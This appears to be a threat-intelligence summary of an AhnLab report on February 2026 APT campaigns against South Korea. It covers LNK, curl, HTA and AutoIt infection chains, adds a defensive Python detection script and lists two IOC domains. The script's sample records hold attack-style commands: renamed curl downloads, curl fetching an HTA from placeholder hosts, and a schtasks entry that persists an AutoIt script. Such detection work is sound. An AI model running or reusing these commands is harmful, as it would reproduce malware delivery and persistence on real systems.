February 2026 APT Attack Trends Report (South Korea)
2026-03-19 • AhnLab
AhnLab observed February 2026 APT activity targeting South Korea, with spear phishing as the dominant delivery method and LNK files the most common attachment type. One LNK chain contacted an external URL through PowerShell, copied curl.exe under another filename, downloaded AutoIt components, and registered a malicious AutoIt script in Task Scheduler for persistence. A second LNK chain used the built-in curl.exe to retrieve a malicious HTA from attacker-controlled GitHub or Google Drive infrastructure, then deployed sys.dll, an infostealer, a keylogger, and a memory-loaded backdoor. The malware collected system information, lists of important files, and virtual-asset-related data, and it supported attacker command execution. The source report provides filenames, MD5 hashes, URLs, and IP addresses for detection.
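Detection logic for the two LNK chains summarized above, added here as an example and not taken from the AhnLab report: it flags a curl.exe copy running under another filename, curl retrieving an HTA, and a scheduled task that launches AutoIt. The Sysmon-style process-creation records are constructed, and the rule names and the use of schtasks.exe for task registration are assumptions.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 (process creation) records; paths, hosts and names are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe -sL https://updates.example.org/pkg.zip -o C:\Temp\pkg.zip"},
    {"Image": r"C:\Users\Public\svc_update.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"svc_update.exe -o C:\Users\Public\a.zip https://files.example.net/a.zip"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe -L -o C:\Users\Public\doc.hta https://storage.example.com/doc.hta"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 5 /tn Sync /tr "C:\Users\Public\AutoIt3.exe C:\Users\Public\run.au3"'},
]

HTA_RE = re.compile(r"\.hta\b", re.I)                               # HTA named in a URL or output path
AUTOIT_RE = re.compile(r"autoit3?\.exe|\.au3\b|\.a3x\b", re.I)      # AutoIt interpreter or script

def classify(event):
    """Return the names of the (hypothetical) rules that one process-creation event matches."""
    image = ntpath.basename(event["Image"]).lower()
    # OriginalFileName comes from the PE version resource, so it survives a file copy/rename.
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    hits = []
    if original == "curl.exe":
        if image != "curl.exe":
            hits.append("renamed_curl")        # curl.exe copied under another filename
        if HTA_RE.search(cmd):
            hits.append("curl_fetches_hta")    # curl used to retrieve an HTA
    # Assumption: the task is registered with schtasks.exe; other registration paths are not covered.
    if original == "schtasks.exe" and "/create" in cmd.lower() and AUTOIT_RE.search(cmd):
        hits.append("schtask_autoit")
    return hits

def triage(events):
    """Return (image name, matched rules) for every event that matched at least one rule."""
    results = ((ntpath.basename(e["Image"]), classify(e)) for e in events)
    return [(name, hits) for name, hits in results if hits]

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_EVENTS):
        print(name, hits)
```

Matching on `OriginalFileName` rather than the image name is what catches the renamed copy; the same comparison can be expressed in any SIEM that ingests Sysmon process-creation events.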
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | hypernotepad.com | 2026-03-19 | 2026-05-26 |
| DOMAIN | newjo-imd.com | 2026-03-19 | 2026-05-14 |